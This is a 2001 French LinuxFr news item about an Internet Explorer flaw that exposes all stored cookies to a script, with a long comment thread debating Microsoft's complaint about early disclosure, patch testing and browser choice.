"Des p'tits trous, des p'tits trous, encore des p'tits trous" dans Internet Explorer

Posté par  . Modéré par Fabien Penso.
Étiquettes :
0
14
nov.
2001
Microsoft
VNU Net nous indique que, a la surprise generale, Internet Explorer (les dernieres versions 5.5 et 6) peut donner accès à tous les cookies présents sur le navigateur avec un simple script...





Je vous aurais bien mis un petit lien pour patcher vos navigateurs (y'en a qui bossent sous Windows), mais le site de Microsoft indique que :




"Why isn't there a patch available for this issue?




The person who discovered this vulnerability has chosen to handle it irresponsibly, and has deliberately made this issue public only a few days after reporting it to Microsoft. It is simply not possible to build, test and release a patch within this timeframe and still meet reasonable quality standards."





Ce qui peut se traduire par (Attention, traduction perso) :


"Pourquoi n'y a-t-il pas de mise à jour corrigeant ce problème ?


La personne qui a découvert cette vulnerabilité a choisi de se comporter de facon irresponsable, et ne l'a déliberemment rendue publique que quelques jours après l'avoir rapportée a Microsoft. Il est tout simplement impossible de développer, tester et rendre disponible une mise à jour dans un si court laps de temps, tout en maintenant une qualité raisonnable."

Aller plus loin

  • # À citer dans le dictionnaire de la mauvaise foi.

    Posté par  (site web personnel) . Évalué à 10.

    ... ne l'a deliberemment rendue publique que quelques jours apres l'avoir rapportee a Microsoft.
    ... un si court laps de temps


    Quelques jours, pour une faille aussi grossière, ils ne seraient pas en train de se moquer de nous, là ?
  • # LES CORRECTIFS SONT ICI:

    Posté par  . Évalué à 10.

  • # Question de responsabilité

    Posté par  (site web personnel) . Évalué à 10.

    Microsoft, on le sait, bataille pour faire respecter une chartre qui 'interdirai' la revelation des bugs sur la place publique ...

    Donc, ils vont persister dans cette voie.
    Etant donné qu'ils ont un sacré monopole, ils ne vont pas se presser a corriger le bug a mon avis. (desolé pBpG, c'est mon avis, quand la politique se mele du travail des dev, on en tire rien de bon)
    Ce qui est tres marrant, c'est que Microsoft a quand meme ete prévenu... Mais a décidé de laisser trainer le problème.
    Au lieu de dire, simplement, humblement : nous allons chercher a regler le pb, ils rejettent la faute sur le type qu'a trouvé le bug.

    EH OH ... MSIE, c'est quand meme vous qui l'avez développé ...

    Faut pas pousser non plus ..
    • [^] # Orthographe !

      Posté par  . Évalué à -10.

      > une chartre qui 'interdirai' la revelation

      une charte qui interdirait la révélation (bon ok, pour les accents, je veux bien oublier): -2

      > Au lieu de dire, simplement, humblement

      humblement; ce mot est un qualificatif complètement irréaliste du sujet; -3

      Ah mais.
    • [^] # Re: Question de responsabilité

      Posté par  . Évalué à 9.

      >MSIE, c'est quand meme vous qui l'avez développé

      Non. Ils ne développent pas chez Microsoft, il rachètent, rajoutent des bugs, et revendent plus cher.

      MSIE est basé sur Mosaic, un des premiers browsers (sorti en 1993 alors qu'il n'existait qu'une centaine de sites web) développé par le NSCA ( National Center for Supercomputing Applications) de l'université de l'Illinois.

      De même, la série des MS-DOS est basé sur le QDOS, le Quick and Dirty Operating System développé en 1981 à l'arrache par Tim Patterson de Seattle Computers. Micosoft a racheté le QDOS pour une bouchée de pain, l'a juste renommé MS-DOS, et a demander à IBM de continuer le développement. Le plus rigolo, c'est qu'ils n'avaient pas vu qu'il y avait des bouts de code dans le QDOS qui appartenaient à Digital Research qui leur a fait un procès (en leur sortant les copyrights direct des fichiers, ça me rappelle un truc ça...). Par la suite, en 1987, Digital Research sort le DR-DOS, que Microsoft s'empresse immédiatement de copier, d'où procès de Caldera, éditeurs actuels du DR-DOS...

      Voilà, voilà....
      Et encore, je ne parle même pas de la pile IP de windows...
      </troll>
  • # Dans la droite ligne...

    Posté par  . Évalué à 10.

    ... de la politique de Microsoft de gerer "l'anarchie de l'information" en matière de divulgation de failles de sécurité (cf le lien qu'ils donnent sur leur page, qui renvoie au discours du monsieur Culp).

    Parler d'irresponsabilité a ici une certaine saveur.

    La question est pourtant: qui est l'irresponsable ?
    Celui qui a permis que la faille existe ?
    Ou celui qui utilise malicieusement la faille lorsqu'il l'a découverte ?

    Ca n'est, dans une certaine mesure, pas le premier. Il est au contraire responsable de la chose. Et ca peut arriver a n'importe qui.

    Ca n'est pas non forcément le second, à moins que sa position le mette justement dans l'obligation d'assurer la sécurité des clients de Microsoft.

    MS est tout autant responsable de cette faille et de son exploitation malicieuse, qu'est le "découvreur" responsable de son utilisation frauduleuse.
    • [^] # Re: Dans la droite ligne...

      Posté par  (site web personnel) . Évalué à 10.

      Je vais peut-être dire une grosse bêtise... Je vais accuser méchamment, sans preuves.
      Attention, je vous aurai prévenu.

      Et si cette faille avait été intentionnelle ?

      Je pense que des boites seraient prêtes à payer assez cher pour connaitre les sites visités par l'utilisateur, non ? MS n'aurait plus qu'à vendre (sous NDA, bien sûr) la méthode pour récupérer tout ça.

      Bon, -1, parce que ca manque d'arguments, de preuves et (j'espère) de réalisme.
      • [^] # Re: Dans la droite ligne...

        Posté par  . Évalué à 10.

        C'est trés possible ce que tu viens de dire là et ça ne manque pas de réalisme, au contraire. Quand tu fais du closed source, qu'est-ce qui t'empêche de laisser des backdoors et de les exploiter par la suite? Dans ce cas précis, soit ils mettent au courant certains clients trés fidéles moyennant une forte rémunération où ils gérent eux mêmes la backdoor en revendant les infos collectées. D'où leur irritation quand un pauvre débile tombe sur la vache à lait!
        Celà est valable pour toute boite faisant du closed source mais microsoft n'a t'il pas été pris les mains dans le sac à plusieurs reprises et notamment avec la NSA.
        Bref, on peut penser que c'est du pur délire de linuxien mais qui peut nous PROUVER que ce n'est que divagation? Je ne veux pas de commentaires à la pbpg disant "mais non, ce n'est pas possible. Ils ne font pas ça....". Allergy et moi, nous voulons juste des PREUVES ;)
        C'est un comportement que tout consommateur devrait avoir.
      • [^] # Re: Dans la droite ligne...

        Posté par  . Évalué à 2.

        Ce qui me semble bizzare, c'est qu'um bug permette cela. Normalement, un bug plante un programme, fait qu'un truc ne marche pas correctement, mais n'ouvre jamais des trous de sécurité pareils. C'est ça qu'ont d'étranges les bugs microsoft ...
  • # To be moumoute or not to be moumoute

    Posté par  (site web personnel) . Évalué à 5.

    J'espère que ça fera comprendre aux quelques visiteurs de DLFP browsant de leur machine perso sous IE que c'est pas top moumoute ;)

    L'association LinuxFr ne saurait être tenue responsable des propos légalement repréhensibles ou faisant allusion à l'évêque de Rome, au chef de l'Église catholique romaine ou au chef temporel de l'État du Vatican et se trouvant dans ce commentaire

  • # Bruce Schneier n'est pas du même avis que les "experts" de Microsoft

    Posté par  (site web personnel) . Évalué à 10.

    http://www.zdnet.com/zdnn/stories/comment/0,5859,2824251,00.html(...)

    C'est la réponse de M. Bruce Schneier à M. Scott Culp, reponsable de l'équipe sécurité chez microsoft (ah bon, ils en ont une ?), qui racontait sur http://www.microsoft.com/technet/treeview/default.asp?url=/technet/(...) que les bugs affectant la sécurité ne devaient pas être divulgués à la masse populaire, car des informations pareilles mènent tout droit à l'anarchie.
  • # Question bête...

    Posté par  . Évalué à 10.

    Bah oui, les failles sont rapportées de la même façon pour les produits Microsoft que pour les Logiciels Libres comme Apache, Linux, les BSD, je pense.
    Alors pourquoi Monsieur Microsoft est encore en train de se plaindre? De quel droit aurait-il le privilège de ne pas voir ses failles révélées?

    Comme ça, dans les stats, les Logiciels Libres auraient plus de failles rapportées, ça ferait un bon argument commercial, ça :) Bon, d'accord, ça, c'est un troll...
    • [^] # Re: Question bête...

      Posté par  (site web personnel) . Évalué à 2.

      Malheureusement, c'est pas un troll mais une réalité :(

      L'association LinuxFr ne saurait être tenue responsable des propos légalement repréhensibles ou faisant allusion à l'évêque de Rome, au chef de l'Église catholique romaine ou au chef temporel de l'État du Vatican et se trouvant dans ce commentaire

      • [^] # Précision ?

        Posté par  . Évalué à 2.

        On dit qu'il y a plus de failles rapportées sur les logiciels libres que sur les produits commerciaux, mais j'aimerais plus de détails sur les "chiffres".

        Parce qu'étant donné le nombre de LL qui existent, si on les compte tous et qu'on fait la somme des failles rapportées sur l'ensemble, il doit bien y en avoir un nombre assez conséquent...

        Par contre, si on se limite aux serveurs web, il y a bien moins de rapports de failles sur apache que sur IIS...
        Il y a de même bien moins de rapports de failles sur tous les navigateurs "gecko-based" que sur IE...

        Alors soit j'ai raté un épisode, soit c'est des foutaises...

        PS: faut voir aussi ce qu'on appelle faille...
        • [^] # Re: Précision ?

          Posté par  (site web personnel) . Évalué à 3.

          Je disais pas que les LL ont plus de trous de sécurité (moins à mon avis) mais que c'est vrai que c'est un argument commercial.

          On pourrait dire par exemple : "IE a moins de trou de sécurité" parce qui ne sont pas visibles mais si on avaient les sources, il en pleuverait ;)

          PS: Mon exemple est nul mais je connais pas de produit microsoft avec peu de bugs (même paint m'a fait un docteur Watson hier au boulot ;)

          L'association LinuxFr ne saurait être tenue responsable des propos légalement repréhensibles ou faisant allusion à l'évêque de Rome, au chef de l'Église catholique romaine ou au chef temporel de l'État du Vatican et se trouvant dans ce commentaire

          • [^] # Re: Précision ?

            Posté par  . Évalué à -1.

            Non, c'est rien, c'est mon cerveau qui est défaillant, j'avais mal lu le premier message...
    • [^] # Re: Question bête...

      Posté par  . Évalué à -2.

      Il n'a JAMAIS dit qu'il ne fallait pas reveler les failles de securite, il a dit qu'il ne faut pas reveler les DETAILS qui permettent d'EXPLOITER la faille avant que le patch soit sorti.

      En gros dire qu'il y a une faille dans X concernant la gestion des cookies ca pose pas de probleme, mais dire qu'en utilisant ce soft Y avec les parametres Z tu peux faire torcher toutes les machines du coin ou piquer les infos des gens et le faire avant la sortie du patch, ben c'est a eviter.
      • [^] # Re: Question bête...

        Posté par  (site web personnel) . Évalué à 5.

        Il n'a JAMAIS dit qu'il ne fallait pas reveler les failles de securite, il a dit qu'il ne faut pas reveler les DETAILS qui permettent d'EXPLOITER la faille avant que le patch soit sorti.

        " The person who discovered this vulnerability has chosen to handle it irresponsibly, and has deliberately made this issue public only a few days after reporting it to Microsoft"

        Ils parle de 'issue' pas de detail permettant de l'exploiter, arrete la mauvaise foi stp.
  • # Démonstrateur de la faille

    Posté par  . Évalué à 8.

    Vous pouvez tester la faille sur http://www.application-servers.com(...)
  • # Danger!

    Posté par  . Évalué à 10.

    Vous oubliez de dire que c'est ULTRA dangereux. Par exemple y a des sites de banques ou on peut faire des virements bancaires. Et l'authentification passe par les cookies! Donc si une personne remarque le cookie ID=76564457696545322345656687 et dont le site est www.bnpnet.bnp.fr ben je crains qu'il soit possible pour le truand d'accéder au compte de la victime.

    PS: Je dis ca au hazard, l'authenfication de bnpnet passe aussi (peut-être) par les adresses ip.
    • [^] # Re: Danger!

      Posté par  . Évalué à 1.

      J'espère simplement que ce bug (feature ?) ne permet pas de lire également les cookies qui ne doivent être transmis que sur une connexion sécurisée ... (c'est une des options à la création d'un cookie)

      Mais bon, quand on voit le nombre de site utilisant des connexions en clair alors qu'elles devraient manifestement être chiffrées, il ne faut plus se faire trop d'illusions sur l'impact :-(. Si maintenant on apprend en plus que les cookies normalement sécurisés peuvent être récupérés par un autre site, c'est la névrose assurée pour tous ceux qui font un tant soit peu attention à la sécurité.
      • [^] # Re: Danger!

        Posté par  . Évalué à -1.

        Une "bonne" solution (on va dire rustine, plutot) consiste a chiffrer ce qu'on met dans le cookie.
        • [^] # Completement inutile.

          Posté par  . Évalué à 10.

          Le serveur S1 envoie un cookie chiffré.
          Le client C enregistre le cookie chiffré.
          Le client C renvoie le cookie chiffré à S1.
          Le serveur S1 verifie le cookie _chiffré_

          Bref, crypté ou pas, SSL ou pas, si un mechant accède par un script à ce cookie, il peut se faire passer pour C, puisque lui aussi, aurra ce cookie chiffré et envoyé via SSL sur S1

          En imaginant que l'ip aussi est verifiée, si le mechant est derrière/utilise le meme proxy ( d'entreprise par exemple), la sécurité saute aussi.
          En imaginant qu'il y ait un hash ID/date d'expiration du cookie, est-ce suffisant ? non plus.

          Bref, beaucoup de webmaster/web agency/devel web de pacotille, ont des raisons de trembler en ce moment et c'est bien fait pour leurs gueules.

          En ce qui concerne reveler les failles de sécurité des produits microsoft avant même qu'ils soient corrigés, c'est d'interêt general, une mission de salubrité publique. Ca fera reflechir beaucoup de gens, et ternir definitivement l'image de cette société dont, visiblement, la sécurité et le respect de la vie privée de leurs clients n'est pas une priorité.
    • [^] # Re: Danger!

      Posté par  (site web personnel) . Évalué à 5.

      oui

      la plupart de sites de banques utilisent des session qui ont de petits timeout et mémorisent l'IP généralement. Enfin en gros c'est pas programmé avec les pieds.

      Par contre ca peut permettre de prendre l'identité de qq'un sur DLFP par ex.
      • [^] # Re: Danger!

        Posté par  (site web personnel) . Évalué à -1.

        Par contre ca peut permettre de prendre l'identité de qq'un sur DLFP par ex.

        Je ne vois pas quel lecteur de DLFP voudrait se faire passer pour un utilisateur d'IE :)
    • [^] # Prenons les devants

      Posté par  . Évalué à -1.

      Moi je vais sur le site de ma banque avec mozilla. Même que leur HTML passe mal...
  • # Et alors?

    Posté par  . Évalué à 0.

    Cela vous etonne-t-il que Microsoft tienne ce genre de discours?

    Ils veulent empecher les diffusion de failles de securite pour tous les logiciels, alors...

    C'est quand meme assez marrant quand meme quand ils disent qu'ils n'ont pas eu le temps de le corriger.
    Si je ne m'abuse, certains bugs de KDE ( c'est le seul gros projet que je connaisse assez bien) sont corriges dans la foulee de leur decouverte!
    Et je suis sur que pour GNOME, le noyau, et autres, c'est pareil.

    Merci MM Blammer et Gates.
  • # Petite correction de la traduction.

    Posté par  . Évalué à 5.

    "Pourquoi n'y a-t-il pas de mise a jour corrigeant ce problème ?
    La personne qui a decouvert cette vulnerabilité a choisi de se comporter de façon irresponsable, et l'a délibéremment rendue publique à peine quelques jours après l'avoir rapportée à Microsoft. Il est tout simplement impossible de développer, tester et rendre disponible une mise à jour dans un si court laps de temps, tout en maintenant une qualité raisonnable."

    La formulation originale donne plutôt l'idée que Microsoft regrettent que cette personne ait attendu quelques jours, plutôt que de publier la faille immédiatement.

    C'est la seule chose que j'ai à redire de cette traduction.

    -1, ça n'est qu'une argutie futile.
  • # MAIS POURQUOI TOUT LE MONDE UTILISE MSIE !!!

    Posté par  . Évalué à -1.

    Franchement y a de quoi s'inquieter !
    85 % des Internautes utilisent un logiciel avec plein de trou de sécurité, veulent t-ils engraisser les hackers ? (Ou est ce un don volontaire ?).

    Franchement je suis stupefait de voir que 85 % (voir 90%) utilise un soft pareil !

    Meme sur les sites Linux MSIE represente une proportion non négligeable (Lea-linux : 50% (dont beaucoup de MSIE 6.0), Mandrake : 50 %, Linuxfr.org : environ 35%, SuSE : 25%).

    Y a vraiment de quoi se poser des questions.

    OK y a 3 ans il n'y avait pas de reelle alternative : Netscape etait buggé, Opera payant.

    Mais maintenant c'est plus le cas ! :
    - Netscape 6.2 est devenu un outil stable, complet(Jamais vu aussi complet d'ailleurs) et efficace, meme si des bugs subsistent (Comme IE d'ailleurs !).
    - Opera 5.12 est maintenant Gratuit, je l'ai comparé sur des sites lourds avec Netscape 6.2 et il semble l'egaler, et sur certains site le depasser (meme si Opera possede plus de bugs d'affichage que Netscape 6.2).
    - Mozilla 0.9.5 est un navigateur Excellent et n'a rien à envier à Netscape 6.2, meme si ce dernier est lus complet (et malheureusement plus compatible sur certains sites).
    - Galeon est le navigateur le plus leger (mis a par Lynx) que j'ai jamais vu, mais ce n'est qu'un Navigateur. Il affiche les pages aussi vite que Netscape 6.2


    Et les futures Alternatives :
    - Konqueror est de plus en plus stable et efficace, cependant il n'est pas encore mure a mon gout (certains site le fait planter, moins rapide que Netscape 6.2).
    - Nombreux Navigateurs nouveaux se basant sur Gecko.


    FRANCHEMENT FAUT ME DIRE POURQUOI VOUS UTILISEZ MSIE (ET SURTOUT POUQUOI MSIE 6.0) QUAND ON A MAINTENANT UNE MULTITUDE D'ALTERNATIVE,DONT CERTAINES PLUS PERFORMANTES.
    MOI JE SUIS STAGIAIRE DANS UNE ENTREPRISE QUI UTILISE QUE MSIE POURTANT J'AI INSTALLE LE DERNIER NETSCAPE ET OPERA 5.12.
    IL EST VRAI QUE L'ADMIN NE ME DONNERA AUCUN SUPPORT, MAIS JE SUIS PAS FAINEANT (ET PAS CON).
    JE VAIS LUI MONTRER CETTE NEWS, PEUT ETRE CHANGERA T-IL D'AVIS.
    • [^] # Re: MAIS POURQUOI TOUT LE MONDE UTILISE MSIE !!!

      Posté par  . Évalué à -1.

      Petit cours pour anonyme.

      Netscape 6.2, et Galeon viennent du meme source que Mozilla (Netscape 6.2 est une version customisée de Mozilla 0.9.4 et Galeon utilise le meme moteur de rendu Gecko).

      > FRANCHEMENT FAUT ME DIRE POURQUOI VOUS UTILISEZ MSIE
      > QUAND ON A MAINTENANT UNE MULTITUDE D'ALTERNATIVE,DONT CERTAINES PLUS PERFORMANTES.

      Parce quand j'arrive sur mon poste, qu'il y a deja un navigateur d'installe qui marche, je l'utilise. J'ai juste besoin d'aller sur le net, point. Rien d'autre. Je me fout eperdument du fait que ce soit MSIE ou autre chose. Tant que ca marche suffisamment pour faire ce que je veux.

      Parce que quand je suis chez moi, et que j'ai un ordinateur pour faire ce que je veux, ca marche suffisamment bien (pas parfait, mais suffisant). Ayant un modem 33.6, n'ayant pas d'attrait pour les magazines informatiques a 35 francs 6 sous (les 6 sous, c'est pour le contenu, en general), je n'ai pas envie de me telecharger 5 a 6 Mo pour un navigateur, alors que j'en ai deja un d'installé sur mon poste.

      Pour finir, moi aussi, j'ai installé Mozilla sur mon poste, au boulot, et chez moi. Et je m'en sers.
      N'empeche. Utiliser un navigateur web (et meme un OS) n'a rien d'une question d'avis. On utilise ce qui nous permet de faire ce qu'on veut. On n'entre pas dans de stupide gamineries de boutonneux a la "moi je pisse plus loin, et plus droit".

      Ca ne m'empeche pas d'etre plutot enclin a utiliser du logiciel libre.

      Mais un commentaire comme celui la, ca me donne envie d'etre con (si je ne le suis pas deja) et d'en prendre le contre pied.
      • [^] # Une question, comme ça !

        Posté par  . Évalué à -1.

        Selon toi les gens utilisent MSIE car c'est deja installé, et que dans les entreprises on ne peux pas installer de soft.

        Comment peux tu expliquer que MSIE 6.0 = 15 % avec comme OS Win 98 ou Win 2000 (parle pas de Win XP)

        Il y a contradiction, non ?
    • [^] # Re: MAIS POURQUOI TOUT LE MONDE UTILISE MSIE !!!

      Posté par  . Évalué à -4.

      Pourquoi j'utilises MSIE ?
      Parceque je n'ai pas le choix.

      Dans ma boite, ils utilise des Serveurs NT, avec des proxys NTLM, MS Exchange, etc.
      Je suis donc obligé d'utiliser IE, Mozilla ou Netscape ne passent pas le proxy.

      Certaines entreprises ont fait le choix du Tout Microsoft, et c'est pas si facile d'en sortir (il faut une volonté politique).

      Donc tes leçons de morale, hein ...
    • [^] # Re: MAIS POURQUOI TOUT LE MONDE UTILISE MSIE !!!

      Posté par  (site web personnel) . Évalué à 2.

      Je suis d'accord avec toi sur le fait que Netscape 6.2 est maintenant une alternative crédible à MSIE (contrairement à la version 6.1 et surtout les 6.0x). Le seul problème avec Netscape 6, c'est qu'il lui faut une machine rapide (128 Mo et 500 Mhz mini), essaye de l'installer sur une machine du type K6, et tu reviendra vite sous MSIE. Et puis les gens sont tellement fainéant qu'ils ne cherchent pas a changer un soft qui est présent par défaut ...
      • [^] # Re: MAIS POURQUOI TOUT LE MONDE UTILISE MSIE !!!

        Posté par  . Évalué à 2.

        Euh, j'ai un P2 300 MHz, et mon Mozilla 0.9.5+ il est super rapide dessus.

        La RAM, je veux bien, mais la puissance CPU, c'est vraiment pas une nécéssité de Mozilla/NS6
    • [^] # Re: MAIS POURQUOI TOUT LE MONDE UTILISE MSIE !!!

      Posté par  . Évalué à 1.

      Parce que IE est disponible nativement sur les machines Windows et necessaire pour son administration.

      Parce que IE se charge tres vite et est plus performant que Netscape 4.7, il suffit de voir Netscape se depatouiller avec les tables imbriquees pour en prendre conscience.

      Parce que l'alternative viable arrive seulement sur le marche.

      Parce que les kits de connexion des ISP fournissent IE et que le neuneu qui se pointe sur le net avec son PC n'a ni la competence ni l'envie de se faire chier a installer autre chose pour la gloire. Il n'a d'ailleurs pas conscience de la gloire a acquerir, il vient consommer son abonnement internet d'autant que le changement de navigateur peut lui apporter plus de boires que d'avantages "grace" aux sites optimises pour IE.

      Parce que des sites web ou intranet utilisant des techno MS font usage de composants softs qui ne marchent qu'avec IE (ActiveX, COM, DCOM).

      Parce qu'une boite qui gere un parc important de machines ne va pas s'emmerder a tester d'autres softs installes nativement pour la seule "ideologie" et rentrer dans un processus de validation de solution qui ne lui apportera rien d'autre que de perdre du temps donc de l'argent pour faire plaisir a un stagiaire linuxien qui bien souvent est tellement polarise sur son truc qu'il en apparait virulent et non credible meme si sur le fond il n'a pas tord.
      La meme boite ne va pas non plus perdre de l'energie a supporter moultes applications pour la gloire ou parce qu'il y a quelques salaries qui s'excitent bruyamment comme des puces derriere leur bureau...

      T'as encore la chance d'avoir ton pc de bureau pour le boulot. Avec les clients legers Windows tu ne peux plus rien faire que de subir les applis installees !
    • [^] # Re: MAIS POURQUOI TOUT LE MONDE UTILISE MSIE !!!

      Posté par  . Évalué à 2.

      Par paresse, quand c'est déjà installé. Et qu'on a ses petites habitudes.
      Par méfiance envers des machins qu'on connait pas.
      Par j'm'en-foutisme envers les menaces brandies. Hackers ? M'en branle, j'achète jamais rien en ligne, pas de risque que mon ordinateur devine tout seul et divulgue mon numéro de CB. Espions ? Génial, ça va vachement les intéresser de lire mon "Coucou machin, j'pourrais pas venir à la réunion ce week-end" ou mon "Salut tantine, tu va bien ?". Prose originalle, passionnante, et infiniment digne d'intérêt pour ceux qui ne sont pas de la famille (je dis ça ironiquement, bien sûr, mais je n'ai jamais compris comment on pouvait avoir une mentalité de concierge ou regarder Loft Story).

      Enfin bon, je dis tout ça, mais je suis pas représentatif: j'utilise Konqueror, et j'aime beaucoup la possibilité de désactiver ou activer définitivement les cookies pour certain sites.
    • [^] # Re: MAIS POURQUOI TOUT LE MONDE UTILISE MSIE !!!

      Posté par  (site web personnel) . Évalué à 6.

      Galeon est le navigateur le plus leger (mis a par Lynx) que j'ai jamais vu

      Non, il y a dillo qui est encore plus léger :)

      FRANCHEMENT FAUT ME DIRE POURQUOI VOUS UTILISEZ MSIE

      Moi, shift, pourtant habitué du moulage sur la tribune et qui n'utilise que Linux à la maison (sauf pour le déschtroumphage (#?/§!! de xawdecode)), je peux t'assurer que non on n'a pas toujours le choix au travail.
      Je suis prestataire de service et je suis actuellement chez un gros assureur français. Je peux te dire que leur culture est à fond poussé vers le proprio. On a bien réussi à leur faire utiliser de l'open-source (netbeans, jakarta, fop,...) mais c'est encore loin d'être gagné.
      Ensuite, je développe un truc à la Intranet où les clients sont des postes WinNT avec navigateur IE. Je suis donc en permanence sous IE pour tester mes pages et je me vois mal lancer un 2ème navigateur sachant que j'ai déjà netbeans + weblo qui tourne en tache de fond.
      De plus, les sessions NT sont "super sécurisées" : pas le droit de changer le fond d'écran, remise à zéro des préférence qd on se relogue,... Celà implique la suppression de toutes les préférences des autres navigateurs autres que IE, et donc adieu les signets de la veille.

      Je le redis donc : NON PARFOIS ON N'A PAS LE CHOIX

      PS : Mais j'espère qu'un jour ça changera. Je pense qu'en montrant les qualités de Linux et les défauts de Windows, un jour ils verront qu'il y a des alternatives fiables. C'est ce que je m'efforce de faire chez tout les clients. (J'ai même donné des formations Weblogic sous Linux avec xpdf)

      L'association LinuxFr ne saurait être tenue responsable des propos légalement repréhensibles ou faisant allusion à l'évêque de Rome, au chef de l'Église catholique romaine ou au chef temporel de l'État du Vatican et se trouvant dans ce commentaire

    • [^] # Re: MAIS POURQUOI TOUT LE MONDE UTILISE MSIE !!!

      Posté par  (site web personnel) . Évalué à 1.

      Parce que MSIE est le seul qui supporte à peu près la norme W3C. et le seul espoire sous linux est Konqueror..........
      comme le site merdait, j'ai fait ma réponse ici:
      http://www.multimania.com/lahaye/divers/Pourquoi_IE.html(...)
  • # et PasBillPasGates dans tout ca ?

    Posté par  . Évalué à 1.

    ben oui PGPB il est bien sensé bosser dans l'équipe qui fabrique les patchs non ?

    Ca en est ou ? pourquoi il faut autant de jour pour faire un patch alors que sous linux il y'a eu des patchs sortis quelques heures avant ?
    • [^] # Re: et PasBillPasGates dans tout ca ?

      Posté par  (site web personnel) . Évalué à 1.

      il fait comme tout le monde, il moule sur wmcoincoin... rhhhhaaa Balmer va bientôt faire interdire wmcoincoin
      • [^] # Re: et PasBillPasGates dans tout ca ?

        Posté par  . Évalué à 2.

        Récupères les communiqués de presse des années à venir grâce à IPOT:

        Yahoo News - 5 Mai 2003 - Redmond
        <<
        Microsoft a annoncé aujourd'hui, au cours d'une conférence de presse, la disponibilité de son nouveau programme winCoinCoin(tm).
        "Jusqu'ici les moules étaient obligées d'utiliser des programmes batis sur des technologies vieilles de 30 ans. Maintenant ça va changer." a déclaré le porte parole de la firme.
        "Il était naturel d'intégrer cette fonctionalité essentielle au coeur du système d'exploitation. winCoinCoin est particulièrement bien intégré à Windows(R), procurant une expérience de moulage sans pareille" a-t-il ajouté.
        winCoinCoin(tm) intégre un trollomètre(R) breveté ainsi qu'une nouvelle technologie révolutionnaire "trollkiller(R)" (brevêtée également) pour supprimer automatiquement les messages injurieux, susceptibles de heurter la sensibilité des utilisateurs, tels que "Microsoft suxx" ou "debian roulaize".
        Une équipe de 34 personnes a participé pendant deux ans à la mise au point de ce nouveau produit. "Nous investissont beaucoup dans la recherche et le développement, c'est important" a précisé le porte parole de microsoft au cours de la conférence de presse.
        Microsoft compte prendre rapidement des parts de marché à ses concurrents. "Je pense qu'ils auront 59,194 % de part de marché dès Noël" a déclaré un consultant du Gartner Group qui assistait à la conférence de presse, qui a par ailleurs expliqué que le programme de Microsoft était meilleur, mais n'a pas su préciser en quoi.
        Joint par mail Richard M. Stallman de la Free Software Foundation, a déclaré "il est important que le moulage reste une activité libre. les moules doivent rester fidèles au libre".
        Les observateurs attendent maintenant la confrontation avec wmCoinCoin dont la version 4.0 qui vient de sortir permet à présent de piloter à distance les cafetières électroniques.
        >>
        • [^] # update

          Posté par  . Évalué à 1.

          Yahoo News - 12 Mai 2003
          <<
          Suite à la découverte d'un importante faille de sécurité dans son nouveau produit winCoinCoin(tm), Microsoft a réagi par la voix de son responsable des questions de sécurité.
          "Il s'agit d'une attitude irresponsable. Ces personnes ont décidé de publier ses informations, c'est intolérable" a déclaré Craig Mundie qui a réclamé le mois dernier dans son éditorial que la divulgation des défauts de sécurité soit institué en crime fédéral.
          "Un correctif sera publié d'ici deux mois." a-t-il précisé.
          La faille annoncée hier sur bugtraq permet à un utilisateur mal intentionné de se faire envoyer les informations collectée par le programme pour être transmise à l'éditeur américain à des fins de "recherche marketing".
          >>
    • [^] # Re: et PasBillPasGates dans tout ca ?

      Posté par  . Évalué à 5.

      pbpg il s'occupe des patch et service packs pour Win2000/NT4/..., pour IE c'est le team IE qui s'en occupe, de meme pour COM c'est le team COM,...

      Quand au patch, ben ca peut paraitre incroyable mais d'abord on regarde ce que ca implique comme changement dans le code, quels risques le fix peut creer, on teste le fix sur plusieurs configs et on ne teste pas que la vulnerabilite, on teste tout l'ensemble pour voir si il fonctionne, et apres on le sort, ca se fait pas en 3h.

      Faut voir que un patch IE qui merde, c'est des millions de personnes qui nous tapent sur la gueule, et IE c'est un soft plutot gros donc pas facile et rapide a tester convenablement. Resultat on fait tout un tas de tests sur des configs differentes et ca prend du temps alors que dans le monde 'libre', d'habitude le dev n'a pas 16 configs differentes pour tester le truc, il teste sur ses 2-3 machines et apres c'est l'utilisateur qui fait le cobaye avec sa config.
      • [^] # Re: et PasBillPasGates dans tout ca ?

        Posté par  . Évalué à 1.

        Resultat on fait tout un tas de tests sur des configs differentes et ca prend du temps alors que dans le monde 'libre', d'habitude le dev n'a pas 16 configs differentes pour tester le truc, il teste sur ses 2-3 machines et apres c'est l'utilisateur qui fait le cobaye avec sa config.

        Non.

        Windows : 1 config.
        Le libre : autant qu'il y a de plateformes.

        Et au fait, quand on fait un logiciel et qu'on le vend, on assume : faut le tester avant. Juste une idée comme ça.
        • [^] # Re: et PasBillPasGates dans tout ca ?

          Posté par  . Évalué à 3.

          ah... tiens je vais transmettre ca aux test teams, ca va les interesser de savoir que tu es plus au courant qu'eux sur leur propre systeme...

          Win95
          Win98
          WinME
          Win2000
          WinNT4

          Tiens j'en ai deja 5 a la base, sans compter les autres modifs pouvant entrer en jeu.

          D'ailleurs, j'aimerais bien savoir combien de projets "libre" font des tests de ce genre avant de sortir un patch et quel type de tests ils font, parce que c'est ecrit nul part, il y a un acces ouvert au code du soft, mais j'ai jamais vu les outils/procedures de test et d'ailleurs je n'en ai jamais entendu parler.

          Qqun a une idee ?
          • [^] # Re: et PasBillPasGates dans tout ca ?

            Posté par  . Évalué à -2.


            Win95
            Win98
            WinME
            Win2000
            WinNT4


            merde je croyais que c'était les mêmes ....

            Ha non y'en qui ont des icones qui bougent, on peut les différencier comme ca ...
          • [^] # Re: et PasBillPasGates dans tout ca ?

            Posté par  . Évalué à -1.

            les devs n'ont surement pas les mêmes procédures qualités que chez Microsoft mais PasBillPasGates, je te met au défi de trouver un bug sous linux qui ait été si mal patché que :
            1°) le patch soit sorti plusieurs semaines après la découverte du bug
            2°) le patch ait été si mal fait qu'il a fallu faire des patchs pour le patch afin de corriger les bugs.
            • [^] # Re: et PasBillPasGates dans tout ca ?

              Posté par  . Évalué à 1.

              1) ben c'est pas mal patche si ca sort plusieurs semaines apres, ca veut simplement dire que ca a ete lent pour une raison X ou Y.

              2)ben prends les changelog du kernel et cherche le mot "revert", et tu trouveras plusieurs cas ou une nouvelle feature/un fix a casse quelque chose d'autre, et ca n'est que le kernel, une toute petite partie de l'OS.
              • [^] # Re: et PasBillPasGates dans tout ca ?

                Posté par  . Évalué à -2.

                1) Réponse détournée
                2) Rien à voir

                1 + 2 démontrent, si c'était encore nécessaire, que tu n'es qu'un sale troll. Oups, j'ai marché dedans !
          • [^] # Re: et PasBillPasGates dans tout ca ?

            Posté par  . Évalué à 4.

